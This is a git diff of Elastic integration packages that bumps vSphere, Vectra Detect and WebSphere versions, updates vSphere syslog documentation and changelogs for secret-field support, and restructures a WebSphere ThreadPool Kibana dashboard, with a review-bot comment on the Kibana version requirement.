@@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: vectra_detect title: Vectra Detect -version: "1.7.1" +version: "1.8.0" source: license: Elastic-2.0 description: Collect logs from Vectra Detect with Elastic Agent. diff --git a/packages/vsphere/_dev/build/docs/README.md b/packages/vsphere/_dev/build/docs/README.md index 3876f9c846e..850f6c08982 100644 --- a/packages/vsphere/_dev/build/docs/README.md +++ b/packages/vsphere/_dev/build/docs/README.md @@ -35,7 +35,7 @@ Datastores are logical containers, analogous to file systems, that hide specific ## Logs -To access the logs, from the Kibana UI, you have to specify the network-accessible IP address of the host where the Elastic Agent will be deployed. +To collect logs, a syslog daemon is used. First, you must configure the listening host/IP address (default: localhost) and host port (default: 9525) in the integration. Then, configure vSphere to send logs to a remote syslog host and provide the configured hostname/IP and port of the Elastic Agent host. ### vSphere Logs diff --git a/packages/vsphere/changelog.yml b/packages/vsphere/changelog.yml index 36559d75bae..f2215beb46b 100644 --- a/packages/vsphere/changelog.yml +++ b/packages/vsphere/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.11.1" + changes: + - description: Add more specific details to vSphere logs configuration documentation. + type: enhancement + link: https://github.com/elastic/integrations/pull/8869 +- version: "1.11.0" + changes: + - description: Enable 'secret' for the sensitive fields. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 - version: 1.10.1 changes: - description: Update details on vSphere logs configuration. diff --git a/packages/vsphere/docs/README.md b/packages/vsphere/docs/README.md index 22f7f2db24f..2a52cce654b 100644 --- a/packages/vsphere/docs/README.md +++ b/packages/vsphere/docs/README.md 
@@ -441,7 +441,7 @@ An example event for `datastore` looks as following: ## Logs -To access the logs, from the Kibana UI, you have to specify the network-accessible IP address of the host where the Elastic Agent will be deployed. +To collect logs, a syslog daemon is used. First, you must configure the listening host/IP address (default: localhost) and host port (default: 9525) in the integration. Then, configure vSphere to send logs to a remote syslog host and provide the configured hostname/IP and port of the Elastic Agent host. ### vSphere Logs diff --git a/packages/vsphere/manifest.yml b/packages/vsphere/manifest.yml index 30e732e84a4..c9bcf9b849f 100644 --- a/packages/vsphere/manifest.yml +++ b/packages/vsphere/manifest.yml @@ -1,7 +1,7 @@ title: VMware vSphere -format_version: "3.0.0" +format_version: "3.0.2" name: vsphere -version: "1.10.1" +version: "1.11.1" description: This Elastic integration collects metrics and logs from vSphere/vCenter servers type: integration categories: @@ -9,7 +9,7 @@ categories: - virtualization conditions: kibana: - version: "^8.10.2" + version: "^8.12.0" elastic: subscription: basic screenshots: @@ -61,6 +61,7 @@ policy_templates: - name: password type: password title: Password + secret: true multi: false required: true show_user: true diff --git a/packages/websphere_application_server/changelog.yml b/packages/websphere_application_server/changelog.yml index 14b45d62ee3..26131b7df3d 100644 --- a/packages/websphere_application_server/changelog.yml +++ b/packages/websphere_application_server/changelog.yml 
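Review bot: The `secret: true` added to the password input in the last manifest hunk only works on stacks that satisfy the `kibana.version` bump to `^8.12.0` made in the earlier hunk of the same file, and the new minimum stack version is not stated in the 1.11.0 or 1.11.1 changelog entries this commit adds. The websphere_application_server changelog in the same commit records a "Disable secrets for older stack versions due to errors" bugfix, so the constraint is worth making explicit to operators, e.g. `- description: Enable 'secret' for the sensitive fields (requires Kibana 8.12.0 or later).`. Any other sensitive inputs in this policy template are outside the hunk and cannot be checked here for the same attribute.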
@@ -1,4 +1,24 @@ # newer versions go on top +- version: 1.3.0 + changes: + - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values + type: enhancement + link: https://github.com/elastic/integrations/pull/9321 +- version: 1.2.1 + changes: + - description: Disable secrets for older stack versions due to errors. + type: bugfix + link: https://github.com/elastic/integrations/pull/9279 +- version: 1.2.0 + changes: + - description: Enable 'secret' for the sensitive fields, supported from 8.12. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 +- version: "1.1.1" + changes: + - description: Inline "by reference" visualizations + type: enhancement + link: https://github.com/elastic/integrations/pull/8423 - version: 1.1.0 changes: - description: Update the package format_version to 3.0.0. diff --git a/packages/websphere_application_server/kibana/dashboard/websphere_application_server-381af9f0-bae2-11ec-b244-51e5cddeab04.json b/packages/websphere_application_server/kibana/dashboard/websphere_application_server-381af9f0-bae2-11ec-b244-51e5cddeab04.json index d8146c9e20c..2d7534710b3 100644 --- a/packages/websphere_application_server/kibana/dashboard/websphere_application_server-381af9f0-bae2-11ec-b244-51e5cddeab04.json +++ b/packages/websphere_application_server/kibana/dashboard/websphere_application_server-381af9f0-bae2-11ec-b244-51e5cddeab04.json 
@@ -1,327 +1,993 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "oneLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"1823c9ec-6346-4b88-9295-a75f2f74730d\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"title\":\"ThreadPool Name\",\"fieldName\":\"websphere_application_server.threadpool.name\",\"id\":\"1823c9ec-6346-4b88-9295-a75f2f74730d\",\"enhancements\":{}}}}" + "id": "websphere_application_server-381af9f0-bae2-11ec-b244-51e5cddeab04", + "type": "dashboard", + "namespaces": [ + "default" + ], + "updated_at": "2023-11-07T17:50:18.506Z", + "version": "WzQyMSwxXQ==", + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"1823c9ec-6346-4b88-9295-a75f2f74730d\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"title\":\"ThreadPool Name\",\"fieldName\":\"websphere_application_server.threadpool.name\",\"id\":\"1823c9ec-6346-4b88-9295-a75f2f74730d\",\"enhancements\":{}}}}" + }, + "description": "ThreadPool dashboard for WebSphere Application Server Metrics.", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "attributes": { + "description": "", + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "5b4f04cc-fca5-4e2e-b12e-a08d6a89d693": { + "columnOrder": [ + "7a5b1405-0e12-4508-82c5-9ffa9ba35996", + 
"c4075f33-09c9-4c38-af7e-190f5b70398e", + "816bda95-3cd2-410e-b17c-8ba494196cf4" + ], + "columns": { + "7a5b1405-0e12-4508-82c5-9ffa9ba35996": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "816bda95-3cd2-410e-b17c-8ba494196cf4": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "websphere_application_server.threadpool.threads.stopped.declared: *" + }, + "isBucketed": false, + "label": "Declared Stopped Threads", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.threadpool.threads.stopped.declared" + }, + "c4075f33-09c9-4c38-af7e-190f5b70398e": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of websphere_application_server.threadpool.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "816bda95-3cd2-410e-b17c-8ba494196cf4", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 3 + }, + "scale": "ordinal", + "sourceField": "websphere_application_server.threadpool.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "websphere_application_server.threadpool.threads.stopped.declared : * " + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "816bda95-3cd2-410e-b17c-8ba494196cf4" + ], + "layerId": "5b4f04cc-fca5-4e2e-b12e-a08d6a89d693", + "layerType": 
"data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "c4075f33-09c9-4c38-af7e-190f5b70398e", + "xAccessor": "7a5b1405-0e12-4508-82c5-9ffa9ba35996" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "Declared Stopped Threads [Metrics WebSphere Application Server]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-5b4f04cc-fca5-4e2e-b12e-a08d6a89d693", + "type": "index-pattern" + } + ] + } }, - "description": "ThreadPool dashboard for WebSphere Application Server Metrics.", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" + "gridData": { + "h": 10, + "i": "b007e627-23d4-4328-b064-3877c40ca3c3", + "w": 23, + "x": 0, + "y": 0 + }, + "panelIndex": "b007e627-23d4-4328-b064-3877c40ca3c3", + "type": "lens", + "version": "8.3.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "attributes": { + "description": "", + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "407fa94b-9ce9-4ac2-9ca6-1c43dea9bbd0": { + "columnOrder": [ + "2f965609-8b37-4e4d-9e83-20ef0901e869", + "6bd7c586-e630-4880-adb8-d82a050bda0c", + "83043110-a317-4821-8372-79219d3eae1e" + ], + "columns": { + "2f965609-8b37-4e4d-9e83-20ef0901e869": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Server Address", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "83043110-a317-4821-8372-79219d3eae1e", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 5 + 
}, + "scale": "ordinal", + "sourceField": "server.address" + }, + "6bd7c586-e630-4880-adb8-d82a050bda0c": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "ThreadPool Name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "83043110-a317-4821-8372-79219d3eae1e", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 3 + }, + "scale": "ordinal", + "sourceField": "websphere_application_server.threadpool.name" + }, + "83043110-a317-4821-8372-79219d3eae1e": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "websphere_application_server.threadpool.threads.total: *" + }, + "isBucketed": false, + "label": "Total Threads", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.threadpool.threads.total" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "websphere_application_server.threadpool.threads.total : * " + }, + "visualization": { + "columns": [ + { + "columnId": "2f965609-8b37-4e4d-9e83-20ef0901e869", + "isTransposed": false + }, + { + "columnId": "6bd7c586-e630-4880-adb8-d82a050bda0c", + "isTransposed": false + }, + { + "columnId": "83043110-a317-4821-8372-79219d3eae1e", + "isTransposed": false + } + ], + "layerId": "407fa94b-9ce9-4ac2-9ca6-1c43dea9bbd0", + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1, + "sorting": { + "columnId": "83043110-a317-4821-8372-79219d3eae1e", + "direction": "desc" } - } + } + }, + "title": "Total Threads in Thread Pool [Metrics WebSphere Application Server]", + "visualizationType": "lnsDatatable", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-407fa94b-9ce9-4ac2-9ca6-1c43dea9bbd0", + "type": "index-pattern" + } + ] + } }, - 
"optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "useMargins": true + "gridData": { + "h": 15, + "i": "d7e182d4-6f2b-4e48-9985-4bfd9d792d0c", + "w": 25, + "x": 23, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {} + "panelIndex": "d7e182d4-6f2b-4e48-9985-4bfd9d792d0c", + "type": "lens", + "version": "8.3.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "attributes": { + "description": "", + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "8d78bbff-634f-4aff-9c25-d3f211b564eb": { + "columnOrder": [ + "665bf1e7-c3ab-45f6-acf3-05ed8ac3001d", + "55c60233-3c4c-4db2-b414-dc40ada3b503", + "1b4e544c-2c46-4a4c-bff2-5f16ff6d9270" + ], + "columns": { + "1b4e544c-2c46-4a4c-bff2-5f16ff6d9270": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "websphere_application_server.threadpool.threads.total: *" + }, + "isBucketed": false, + "label": "Total Threads", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.threadpool.threads.total" + }, + "55c60233-3c4c-4db2-b414-dc40ada3b503": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of websphere_application_server.threadpool.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "1b4e544c-2c46-4a4c-bff2-5f16ff6d9270", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 3 + }, + "scale": "ordinal", + "sourceField": "websphere_application_server.threadpool.name" + }, + "665bf1e7-c3ab-45f6-acf3-05ed8ac3001d": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } 
+ } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "websphere_application_server.threadpool.threads.total : * " + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "gridData": { - "h": 10, - "i": "b007e627-23d4-4328-b064-3877c40ca3c3", - "w": 23, - "x": 0, - "y": 0 + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "b007e627-23d4-4328-b064-3877c40ca3c3", - "panelRefName": "panel_b007e627-23d4-4328-b064-3877c40ca3c3", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { - "enhancements": {} + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 }, - "gridData": { - "h": 15, - "i": "d7e182d4-6f2b-4e48-9985-4bfd9d792d0c", - "w": 25, - "x": 23, - "y": 0 + "layers": [ + { + "accessors": [ + "1b4e544c-2c46-4a4c-bff2-5f16ff6d9270" + ], + "layerId": "8d78bbff-634f-4aff-9c25-d3f211b564eb", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "55c60233-3c4c-4db2-b414-dc40ada3b503", + "xAccessor": "665bf1e7-c3ab-45f6-acf3-05ed8ac3001d" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" }, - "panelIndex": "d7e182d4-6f2b-4e48-9985-4bfd9d792d0c", - "panelRefName": "panel_d7e182d4-6f2b-4e48-9985-4bfd9d792d0c", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { - "enhancements": {} + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "gridData": { - "h": 12, - "i": "f087d207-2453-4b0e-a31f-43ee8d5528c4", - "w": 23, - "x": 0, - "y": 10 + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" }, - "panelIndex": "f087d207-2453-4b0e-a31f-43ee8d5528c4", - "panelRefName": "panel_f087d207-2453-4b0e-a31f-43ee8d5528c4", - "type": "lens", - "version": "8.3.0" + "yRightExtent": { + "mode": "full" + } + } }, - { - 
"embeddableConfig": { - "enhancements": {} + "title": "Total Threads[Metrics WebSphere Application Server]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-8d78bbff-634f-4aff-9c25-d3f211b564eb", + "type": "index-pattern" + } + ] + } + }, + "gridData": { + "h": 12, + "i": "f087d207-2453-4b0e-a31f-43ee8d5528c4", + "w": 23, + "x": 0, + "y": 10 + }, + "panelIndex": "f087d207-2453-4b0e-a31f-43ee8d5528c4", + "type": "lens", + "version": "8.3.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "attributes": { + "description": "", + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "1decd051-dbf6-4a80-aa20-85278fedc2d4": { + "columnOrder": [ + "33936c70-d53c-4ccd-ba8d-f833c3b9dc3e", + "cce82f91-3637-4406-8633-bcd5bfe8a984", + "2b1baf93-2b7f-430d-9048-f11cb2bfb65e" + ], + "columns": { + "2b1baf93-2b7f-430d-9048-f11cb2bfb65e": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "websphere_application_server.threadpool.threads.active: *" + }, + "isBucketed": false, + "label": "Active Threads", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.threadpool.threads.active" + }, + "33936c70-d53c-4ccd-ba8d-f833c3b9dc3e": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "cce82f91-3637-4406-8633-bcd5bfe8a984": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of websphere_application_server.threadpool.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "2b1baf93-2b7f-430d-9048-f11cb2bfb65e", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": 
"terms" + }, + "size": 3 + }, + "scale": "ordinal", + "sourceField": "websphere_application_server.threadpool.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "websphere_application_server.threadpool.threads.active : * " + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "2b1baf93-2b7f-430d-9048-f11cb2bfb65e" + ], + "layerId": "1decd051-dbf6-4a80-aa20-85278fedc2d4", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "cce82f91-3637-4406-8633-bcd5bfe8a984", + "xAccessor": "33936c70-d53c-4ccd-ba8d-f833c3b9dc3e" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" }, - "gridData": { - "h": 12, - "i": "9a2671f2-1ebb-4cdf-ad80-6aae92c17bb0", - "w": 25, - "x": 23, - "y": 15 + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "9a2671f2-1ebb-4cdf-ad80-6aae92c17bb0", - "panelRefName": "panel_9a2671f2-1ebb-4cdf-ad80-6aae92c17bb0", - "type": "lens", - "version": "8.3.0" + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-5c2223d3-b3ba-45a2-848f-2a5e4ab9264c", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "5c2223d3-b3ba-45a2-848f-2a5e4ab9264c": { - "columnOrder": [ - 
"ea4d6628-e862-4e42-a8f3-59572a45894e", - "c4d4248d-67c1-454c-bea0-cfc45f7d43f9", - "4c4a2a46-6244-4e6b-8926-c1c60b6b9df4", - "b093e53a-a7e7-4b74-af63-b3da68cf3989" - ], - "columns": { - "4c4a2a46-6244-4e6b-8926-c1c60b6b9df4": { - "dataType": "number", - "isBucketed": false, - "label": "Median of websphere_application_server.threadpool.total.create", - "operationType": "median", - "scale": "ratio", - "sourceField": "websphere_application_server.threadpool.total.create" - }, - "b093e53a-a7e7-4b74-af63-b3da68cf3989": { - "dataType": "number", - "isBucketed": false, - "label": "Median of websphere_application_server.threadpool.total.destroy", - "operationType": "median", - "scale": "ratio", - "sourceField": "websphere_application_server.threadpool.total.destroy" - }, - "c4d4248d-67c1-454c-bea0-cfc45f7d43f9": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of websphere_application_server.threadpool.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "4c4a2a46-6244-4e6b-8926-c1c60b6b9df4", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "websphere_application_server.threadpool.name" - }, - "ea4d6628-e862-4e42-a8f3-59572a45894e": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + "title": "Active Threads [Metrics WebSphere Application Server]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-1decd051-dbf6-4a80-aa20-85278fedc2d4", + "type": "index-pattern" + } + ] + } + }, + "gridData": { + "h": 12, + "i": "9a2671f2-1ebb-4cdf-ad80-6aae92c17bb0", + "w": 25, + "x": 23, + "y": 15 + }, + 
"panelIndex": "9a2671f2-1ebb-4cdf-ad80-6aae92c17bb0", + "type": "lens", + "version": "8.3.0" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "5c2223d3-b3ba-45a2-848f-2a5e4ab9264c": { + "columnOrder": [ + "ea4d6628-e862-4e42-a8f3-59572a45894e", + "c4d4248d-67c1-454c-bea0-cfc45f7d43f9", + "4c4a2a46-6244-4e6b-8926-c1c60b6b9df4", + "b093e53a-a7e7-4b74-af63-b3da68cf3989" + ], + "columns": { + "4c4a2a46-6244-4e6b-8926-c1c60b6b9df4": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "websphere_application_server.threadpool.total.created: *" + }, + "isBucketed": false, + "label": "Threads Created", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.threadpool.total.created" + }, + "b093e53a-a7e7-4b74-af63-b3da68cf3989": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "websphere_application_server.threadpool.total.destroyed: *" + }, + "isBucketed": false, + "label": "Threads Destroyed", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.threadpool.total.destroyed" + }, + "c4d4248d-67c1-454c-bea0-cfc45f7d43f9": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of websphere_application_server.threadpool.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "4c4a2a46-6244-4e6b-8926-c1c60b6b9df4", + "type": "column" }, - "filters": [], - "query": { - "language": "kuery", - "query": "websphere_application_server.threadpool.total.create : * and websphere_application_server.threadpool.total.destroy : * " + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - 
"axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "4c4a2a46-6244-4e6b-8926-c1c60b6b9df4", - "b093e53a-a7e7-4b74-af63-b3da68cf3989" - ], - "layerId": "5c2223d3-b3ba-45a2-848f-2a5e4ab9264c", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "c4d4248d-67c1-454c-bea0-cfc45f7d43f9", - "xAccessor": "ea4d6628-e862-4e42-a8f3-59572a45894e" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - } - } + "size": 3 + }, + "scale": "ordinal", + "sourceField": "websphere_application_server.threadpool.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {} + "ea4d6628-e862-4e42-a8f3-59572a45894e": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "websphere_application_server.threadpool.total.created : * or websphere_application_server.threadpool.total.destroyed : * " + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "gridData": { - "h": 17, - "i": "30eb3e90-77bb-49f4-bb1f-0f06835a2d99", - "w": 23, - "x": 0, - "y": 22 + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + 
"yRight": true }, - "panelIndex": "30eb3e90-77bb-49f4-bb1f-0f06835a2d99", - "panelRefName": "panel_30eb3e90-77bb-49f4-bb1f-0f06835a2d99", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { - "enhancements": {} + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 }, - "gridData": { - "h": 12, - "i": "52f44709-7bc3-4886-8a11-75e785a3816f", - "w": 25, - "x": 23, - "y": 27 + "layers": [ + { + "accessors": [ + "4c4a2a46-6244-4e6b-8926-c1c60b6b9df4", + "b093e53a-a7e7-4b74-af63-b3da68cf3989" + ], + "layerId": "5c2223d3-b3ba-45a2-848f-2a5e4ab9264c", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "c4d4248d-67c1-454c-bea0-cfc45f7d43f9", + "xAccessor": "ea4d6628-e862-4e42-a8f3-59572a45894e" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" }, - "panelIndex": "52f44709-7bc3-4886-8a11-75e785a3816f", - "panelRefName": "panel_52f44709-7bc3-4886-8a11-75e785a3816f", - "type": "lens", - "version": "8.3.0" - } - ], - "refreshInterval": { - "pause": true, - "value": 0 - }, - "timeFrom": "now-15m", - "timeRestore": true, - "timeTo": "now", - "title": "[Metrics WebSphere Application Server] ThreadPool", - "version": 1 - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-381af9f0-bae2-11ec-b244-51e5cddeab04", - "migrationVersion": { - "dashboard": "8.3.0" - }, - "references": [ - { - "id": "websphere_application_server-43d23d70-baed-11ec-b244-51e5cddeab04", - "name": "b007e627-23d4-4328-b064-3877c40ca3c3:panel_b007e627-23d4-4328-b064-3877c40ca3c3", - "type": "lens" - }, - { - "id": "websphere_application_server-d2cf3ac0-baeb-11ec-b244-51e5cddeab04", - "name": "d7e182d4-6f2b-4e48-9985-4bfd9d792d0c:panel_d7e182d4-6f2b-4e48-9985-4bfd9d792d0c", - "type": "lens" - }, - { - "id": "websphere_application_server-b8c2dff0-baec-11ec-b244-51e5cddeab04", - "name": 
"f087d207-2453-4b0e-a31f-43ee8d5528c4:panel_f087d207-2453-4b0e-a31f-43ee8d5528c4", - "type": "lens" - }, - { - "id": "websphere_application_server-86426870-baec-11ec-b244-51e5cddeab04", - "name": "9a2671f2-1ebb-4cdf-ad80-6aae92c17bb0:panel_9a2671f2-1ebb-4cdf-ad80-6aae92c17bb0", - "type": "lens" - }, - { - "id": "websphere_application_server-888801c0-bae3-11ec-b244-51e5cddeab04", - "name": "30eb3e90-77bb-49f4-bb1f-0f06835a2d99:panel_30eb3e90-77bb-49f4-bb1f-0f06835a2d99", - "type": "lens" + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + }, + "yTitle": "Thread Count" + } + }, + "title": "Number of Threads Created and Destroyed [Metrics WebSphere Application Server]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-5c2223d3-b3ba-45a2-848f-2a5e4ab9264c", + "type": "index-pattern" + } + ] + }, + "enhancements": {} }, - { - "id": "metrics-*", - "name": "30eb3e90-77bb-49f4-bb1f-0f06835a2d99:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" + "gridData": { + "h": 17, + "i": "30eb3e90-77bb-49f4-bb1f-0f06835a2d99", + "w": 23, + "x": 0, + "y": 22 }, 